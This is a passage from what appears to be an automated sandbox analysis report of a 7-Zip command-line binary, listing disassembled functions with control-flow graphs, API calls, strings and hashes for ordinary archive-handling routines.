                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c75879e89a0d6b0eb1bb642928b78a50b68f1ecf96ffdd04da6d3d4d6d5326dc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E651B2727189C181CA70FB65E9A03ADA363F783B90F484116DA9D57759CF38C886CB46
                                                                                                                                                                                                                                                                            Function 006883C8 Relevance: 27.2, APIs: 13, Strings: 5, Instructions: 152COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 3188 6883c8-68841d call 666570 call 6631c0 call 668624 3195 68841f-68844c call 6631c0 call 6686dc 3188->3195 3196 688482 3188->3196 3195->3196 3210 68844e-68847b call 6631c0 call 6686dc 3195->3210 3197 688485-688489 3196->3197 3199 688499-68849d 3197->3199 3200 68848b-688498 free 3197->3200 3202 6884ad-6884b1 3199->3202 3203 68849f-6884ac free 3199->3203 3200->3199 3205 6884bd-6884c0 3202->3205 3206 6884b3-6884b8 free 3202->3206 3203->3202 3208 6885ef-688607 call 663314 free 3205->3208 3209 6884c6-6884ee call 663208 call 688290 3205->3209 3206->3205 3218 68860a-688611 3208->3218 3222 68851b-688538 call 688290 3209->3222 3223 6884f0-688516 call 663314 free * 2 3209->3223 3210->3196 3224 68847d-688480 3210->3224 3229 68853a-688560 call 663314 free * 2 3222->3229 3230 688565-68857b call 688290 3222->3230 3223->3218 3224->3197 3229->3218 3235 68857d-6885a3 call 663314 free * 2 3230->3235 3236 6885a5-6885bb call 688290 3230->3236 3235->3218 3241 6885bd-6885e3 call 663314 free * 2 3236->3241 3242 6885e5-6885ea free 3236->3242 3241->3218 3242->3208
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-3804457719
                                                                                                                                                                                                                                                                            • Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                                                                                            • Instruction ID: 72a5c4a7f2e544cf106fb98c6fe33e6ca9776c60e0dba138dd42aee8c651ee77
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F51B8B220894644CE60FF15E861799A763D7C27E4F841216BF5E577B9CF28C687C708
                                                                                                                                                                                                                                                                            Function 0068AB74 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 3245 68ab74-68aba4 3246 68abd3-68abf5 3245->3246 3247 68aba6 3245->3247 3249 68abfb 3246->3249 3250 68ae31-68ae78 call 6883c8 call 6631c0 call 68a7fc free 3246->3250 3248 68abaa-68abbc 3247->3248 3251 68abce-68abd1 3248->3251 3252 68abbe-68abc9 call 6894a8 free 3248->3252 3253 68ac02-68acba call 663208 call 663518 call 663208 * 2 3249->3253 3268 68ae7a 3250->3268 3269 68ae7f-68ae87 3250->3269 3251->3246 3251->3248 3252->3251 3277 68acbc-68acc1 call 663518 3253->3277 3278 68acc6-68accd 3253->3278 3271 68af7a-68af99 free 3268->3271 3272 68ae99-68aeca call 6631c0 call 68a9fc free 3269->3272 3273 68ae89-68ae94 call 66339c 3269->3273 3288 68aecc 3272->3288 3289 68aed1-68aeee call 6631c0 call 68a9fc 3272->3289 3273->3272 3277->3278 3281 68acd9-68ad35 call 689d98 free * 2 3278->3281 3282 68accf-68acd4 call 663518 3278->3282 3290 68ad51-68ad61 call 662130 3281->3290 3291 68ad37-68ad4c call 68a034 3281->3291 3282->3281 3288->3271 3301 68aef3-68af02 free 3289->3301 3299 68ad6c 3290->3299 3300 68ad63-68ad6a 3290->3300 3302 68addd-68adf2 call 662130 3291->3302 3304 68ad6f-68ad8b call 66b8f0 3299->3304 3300->3304 3305 68af04 3301->3305 3306 68af06-68af10 3301->3306 3311 68ae03 3302->3311 3312 68adf4-68ae01 call 689af0 3302->3312 3317 68adbd-68adc0 3304->3317 3318 68ad8d-68ad93 3304->3318 3305->3271 3309 68af18-68af1b 3306->3309 3310 68af12-68af16 3306->3310 3314 68af2a-68af2e 3309->3314 3315 68af1d-68af24 3309->3315 3310->3314 3319 68ae06-68ae2b call 66b8f0 call 6894a8 3311->3319 3312->3319 3321 68af30-68af36 3314->3321 3322 68af77 3314->3322 3315->3314 3320 68af26 3315->3320 3328 68adda 3317->3328 3329 68adc2-68add3 memmove 3317->3329 3324 68ada1-68adac 3318->3324 3325 68ad95-68ad9a free 3318->3325 3319->3250 3319->3253 3320->3314 3321->3322 3327 68af38 3321->3327 3322->3271 3330 68adae-68adb9 call 662130 3324->3330 3331 68add5-68add8 3324->3331 3325->3324 3333 68af3b-68af5a GetProcAddress 3327->3333 3328->3302 3329->3302 3330->3317 3331->3302 3336 68af5c-68af64 3333->3336 3337 68af66-68af6f 3333->3337 3336->3337 3342 68af73-68af75 3336->3342 3337->3333 3338 68af71 3337->3338 3338->3322 3342->3271
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068ABC9
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068ACF3
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068ACFE
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068AD95
                                                                                                                                                                                                                                                                            • memmove.MSVCRT(?), ref: 0068ADCB
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068AE70
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068AF7F
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 006894DB
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 006894E3
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 006894F0
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 0068951C
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 00689525
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 0068952D
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 0068953A
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068AEC2
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: free.MSVCRT ref: 006633D7
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: memmove.MSVCRT(00000000,?,?,00000000,006610A8), ref: 006633F2
                                                                                                                                                                                                                                                                              • Part of subcall function 0068A9FC: free.MSVCRT ref: 0068AA95
                                                                                                                                                                                                                                                                              • Part of subcall function 0068A9FC: free.MSVCRT ref: 0068AAC5
                                                                                                                                                                                                                                                                              • Part of subcall function 0068A9FC: free.MSVCRT ref: 0068AAD2
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068AEFA
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0068AF4D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove$AddressProc
                                                                                                                                                                                                                                                                            • String ID: 7z.dll$Codecs\$Formats\$SetCodecs
                                                                                                                                                                                                                                                                            • API String ID: 4053071709-2499791885
                                                                                                                                                                                                                                                                            • Opcode ID: 9289078346de572c99ec9685dbc78485ff94832fd4c5465191724674782d05d5
                                                                                                                                                                                                                                                                            • Instruction ID: fba3e12043ff5d3721c106abe4cf06253da92632731b4b37090378786da9f87b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9289078346de572c99ec9685dbc78485ff94832fd4c5465191724674782d05d5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFB1C176208AC196DB60FB61E4903AFB362F385788F404216EF8E47B25DF78C969C705
                                                                                                                                                                                                                                                                            Function 006A1850 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 122COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 3343 6a1850-6a1886 EnterCriticalSection 3344 6a1888-6a188e call 6ab1c8 3343->3344 3345 6a18b1-6a18bb 3343->3345 3351 6a1893-6a18ac 3344->3351 3347 6a18bd call 6622e4 3345->3347 3348 6a18c2-6a18c4 3345->3348 3347->3348 3349 6a18ca-6a18d2 3348->3349 3350 6a1991-6a199e 3348->3350 3353 6a191a-6a192b 3349->3353 3354 6a18d4-6a18da 3349->3354 3355 6a1a4e-6a1a57 LeaveCriticalSection 3350->3355 3356 6a19a4-6a19a7 3350->3356 3351->3345 3360 6a196a-6a1974 3353->3360 3361 6a192d-6a193a call 662300 3353->3361 3354->3353 3357 6a18dc-6a18e2 3354->3357 3358 6a1a59-6a1a62 3355->3358 3356->3355 3359 6a19ad-6a19b7 3356->3359 3364 6a18ed 3357->3364 3365 6a18e4-6a18eb 3357->3365 3363 6a1a31-6a1a4c LeaveCriticalSection 3359->3363 3366 6a19b9-6a19d7 call 662300 fputs 3359->3366 3362 6a197a-6a1981 3360->3362 3360->3363 3361->3360 3375 6a193c-6a1965 fputs call 6626a0 call 662300 3361->3375 3362->3363 3368 6a1987-6a198c call 6622e4 3362->3368 3363->3358 3369 6a18f4-6a18fe 3364->3369 3365->3369 3378 6a19d9-6a19f0 fputs 3366->3378 3379 6a19f2-6a1a14 call 666618 call 662320 free 3366->3379 3368->3363 3369->3360 3373 6a1900-6a1913 fputs call 662300 3369->3373 3381 6a1918 3373->3381 3375->3360 3382 6a1a19-6a1a2c call 662300 call 6622e4 3378->3382 3379->3382 3381->3360 3382->3363
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 006A1877
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A190A
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 006A1A44
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: memset.MSVCRT ref: 006AB20D
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: fputs.MSVCRT ref: 006AB232
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A194D
                                                                                                                                                                                                                                                                              • Part of subcall function 006626A0: fputs.MSVCRT ref: 006626C1
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A19CB
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A19EA
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 006A1A51
                                                                                                                                                                                                                                                                              • Part of subcall function 00662300: fputc.MSVCRT ref: 00662311
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A1A14
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                                                                                                                                                                                                                                                            • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                                                                                                                                                                                                                                                            • API String ID: 676172275-580504279
                                                                                                                                                                                                                                                                            • Opcode ID: 2cc58bddada0519040ac4fc79ebe370a0d8e08b52278b0a9666f8cd599c93609
                                                                                                                                                                                                                                                                            • Instruction ID: 48776441bd3f77f835493618737c11fd011fb8c5b2066393184951e33f197c50
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cc58bddada0519040ac4fc79ebe370a0d8e08b52278b0a9666f8cd599c93609
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF51DF72300A81A2DB5DAF65D9A03ED6322FB47B90F044126DB6E4B351CF38D8B5C705
                                                                                                                                                                                                                                                                            Function 006838E8 Relevance: 22.8, APIs: 13, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 3392 6838e8-683977 call 681700 call 68373c memmove 3397 683979-68398d call 683864 free 3392->3397 3398 683992-6839a5 3392->3398 3408 683cb6-683cc9 3397->3408 3400 6839ab 3398->3400 3401 683a30-683a3d call 683864 3398->3401 3403 6839ae-6839c2 3400->3403 3410 683a3f-683a64 call 6802a0 _CxxThrowException 3401->3410 3411 683a65-683a77 3401->3411 3405 683a1d-683a25 3403->3405 3406 6839c4-6839ec call 6809e0 call 662130 3403->3406 3405->3403 3412 683a27-683a2b 3405->3412 3424 6839fb 3406->3424 3425 6839ee-6839f9 call 663314 3406->3425 3410->3411 3415 683a79-683a7c 3411->3415 3416 683ae1-683b27 call 695f5c call 6813e8 * 2 3411->3416 3412->3401 3420 683a7e-683aac call 663208 call 666e10 call 662130 3415->3420 3439 683c2a-683c46 free 3416->3439 3440 683b2d-683b30 3416->3440 3445 683abd 3420->3445 3446 683aae-683abb call 663314 3420->3446 3430 6839fe-683a16 call 66b8f0 free 3424->3430 3425->3430 3430->3405 3442 683c48 3439->3442 3443 683c76-683c84 free 3439->3443 3444 683b33-683b56 call 662130 3440->3444 3448 683c4c-683c5f 3442->3448 3449 683c88-683c95 3443->3449 3461 683b68 3444->3461 3462 683b58-683b66 call 663314 3444->3462 3447 683ac0-683adf call 66b8f0 free 3445->3447 3446->3447 3447->3416 3447->3420 3453 683c71-683c74 3448->3453 3454 683c61-683c6c free * 2 3448->3454 3455 683ca7-683caa 3449->3455 3456 683c97-683ca2 free * 2 3449->3456 3453->3443 3453->3448 3454->3453 3455->3449 3460 683cac-683cb4 free 3455->3460 3456->3455 3460->3408 3464 683b6b-683ba1 call 662130 3461->3464 3462->3464 3468 683bb3 3464->3468 3469 683ba3-683bb1 call 663314 3464->3469 3471 683bb6-683bc6 3468->3471 3469->3471 3473 683bc8-683be2 call 664338 3471->3473 3474 683be4-683bf2 3471->3474 3473->3474 3478 683bfa-683c29 call 6802a0 _CxxThrowException 3473->3478 3474->3444 3476 683bf8 3474->3476 3476->3439 3478->3439
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0068373C: free.MSVCRT ref: 006837FB
                                                                                                                                                                                                                                                                            • memmove.MSVCRT ref: 0068396F
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00683986
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00683A11
                                                                                                                                                                                                                                                                            • _CxxThrowException.MSVCRT ref: 00683A5F
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00683AD3
                                                                                                                                                                                                                                                                              • Part of subcall function 00683864: free.MSVCRT ref: 00683877
                                                                                                                                                                                                                                                                              • Part of subcall function 00683864: free.MSVCRT ref: 00683892
                                                                                                                                                                                                                                                                              • Part of subcall function 00683864: free.MSVCRT ref: 0068389B
                                                                                                                                                                                                                                                                              • Part of subcall function 00683864: free.MSVCRT ref: 006838C6
                                                                                                                                                                                                                                                                              • Part of subcall function 00683864: free.MSVCRT ref: 006838CE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                                                                                            • String ID: Cannot find archive$Duplicate archive path:
                                                                                                                                                                                                                                                                            • API String ID: 3934437811-2067063536
                                                                                                                                                                                                                                                                            • Opcode ID: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
                                                                                                                                                                                                                                                                            • Instruction ID: 2563294c8101ea2d4eb4ea08e61c4fcba915ec70885123dc1a20de92c9ab557f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DA18372315A9582CB60FB16E49059EB3A2F7C5F90F405616EF8E17B68DF38C946CB04
                                                                                                                                                                                                                                                                            Function 006942A2 Relevance: 21.3, APIs: 13, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 3481 6942a2-6942c0 3483 6942c2-6942d0 3481->3483 3484 6942d5-6942d8 3481->3484 3483->3484 3485 6942da 3484->3485 3486 6942e0-6943ab call 6840c4 memmove call 663404 call 693a20 3484->3486 3485->3486 3494 6945d8-69468f call 663404 * 3 free * 2 call 68419c 3486->3494 3495 6943b1-6943b3 3486->3495 3533 694698-6946a0 3494->3533 3534 694691-694697 3494->3534 3497 6943b9-6943d7 call 68c684 3495->3497 3498 6946c5-6946f4 free * 2 call 68419c 3495->3498 3505 694728-694757 free * 2 call 68419c 3497->3505 3506 6943dd-6943ef call 662130 3497->3506 3508 6946fd-694705 3498->3508 3509 6946f6-6946fc 3498->3509 3525 694759-69475f 3505->3525 3526 694760-694768 3505->3526 3521 6943f1-694401 call 68caac 3506->3521 3522 694403 3506->3522 3511 69470e-694719 3508->3511 3512 694707-69470d 3508->3512 3509->3508 3517 69471b 3511->3517 3518 694721-694723 3511->3518 3512->3511 3517->3518 3524 6947fe-694811 3518->3524 3532 694406-694441 call 66b8f0 free * 2 call 68419c 3521->3532 3522->3532 3525->3526 3529 69476a-694770 3526->3529 3530 694771-69477c 3526->3530 3529->3530 3535 69477e 3530->3535 3536 694784-694786 3530->3536 3551 69444a-694452 3532->3551 3552 694443-694449 3532->3552 3541 6946a9-6946b4 3533->3541 3542 6946a2-6946a8 3533->3542 3534->3533 3535->3536 3536->3524 3543 6947f2-6947fb 3536->3543 3541->3543 3546 6946ba-6946c0 3541->3546 3542->3541 3543->3524 3546->3543 3553 69445b-69446c 3551->3553 3554 694454-69445a 3551->3554 3552->3551 3555 693fa9-694033 memmove 3553->3555 3556 694472-694478 3553->3556 3554->3553 3561 694035-694052 memmove 3555->3561 3562 694054-694072 memmove 3555->3562 3556->3555 3563 694078-6940e9 memmove call 68c0fc call 663404 * 2 call 693d58 3561->3563 3562->3543 3562->3563 3573 6940ee-6940f2 3563->3573 3574 6940f8-69410a call 662130 3573->3574 3575 69447d-694480 3573->3575 3583 69410c-69411c call 68caac 3574->3583 3584 69411e 3574->3584 3576 69450c-69451b call 68419c 3575->3576 3577 694486-69450b call 663404 * 3 3575->3577 3576->3524 3577->3576 3588 694121-69413a call 66b8f0 call 68419c 3583->3588 3584->3588
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
                                                                                                                                                                                                                                                                            • Instruction ID: 0c420b33233a822cd4ca295b9c1e88f1b9e48a27b1b65e046241a6039b4e8a47
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BD15E33209AC486CB61EF65E0906AEBB62F7D6B84F444016DB8E47F29DF78C549CB00
                                                                                                                                                                                                                                                                            Function 006891E0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 103libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$memmove
                                                                                                                                                                                                                                                                            • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                                                                                                                                                                                                                                                            • API String ID: 2879976980-73314117
                                                                                                                                                                                                                                                                            • Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                                                                                            • Instruction ID: f0c464facbcd94ea28f679f00667b74f586d1e617b71623364b9c9a590790400
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8417B72211A41D6DB20EF61F8903ADB3A2F789784F440636EB8E83764DF79C945CB14
                                                                                                                                                                                                                                                                            Function 006A1BC0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 250COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A1CF9
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: memset.MSVCRT ref: 006AB20D
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: fputs.MSVCRT ref: 006AB232
                                                                                                                                                                                                                                                                              • Part of subcall function 00662300: fputc.MSVCRT ref: 00662311
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A1DEE
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A1F07
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A1F5C
                                                                                                                                                                                                                                                                              • Part of subcall function 006A171C: fputs.MSVCRT ref: 006A1744
                                                                                                                                                                                                                                                                              • Part of subcall function 006A171C: fputs.MSVCRT ref: 006A1758
                                                                                                                                                                                                                                                                              • Part of subcall function 006A171C: free.MSVCRT ref: 006A176B
                                                                                                                                                                                                                                                                              • Part of subcall function 00666618: FormatMessageW.KERNEL32 ref: 00666676
                                                                                                                                                                                                                                                                              • Part of subcall function 00666618: LocalFree.KERNEL32 ref: 00666698
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 0066237E
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: fputs.MSVCRT ref: 006623B8
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 006623C4
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A1F86
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$free$FormatFreeLocalMessagefputcmemset
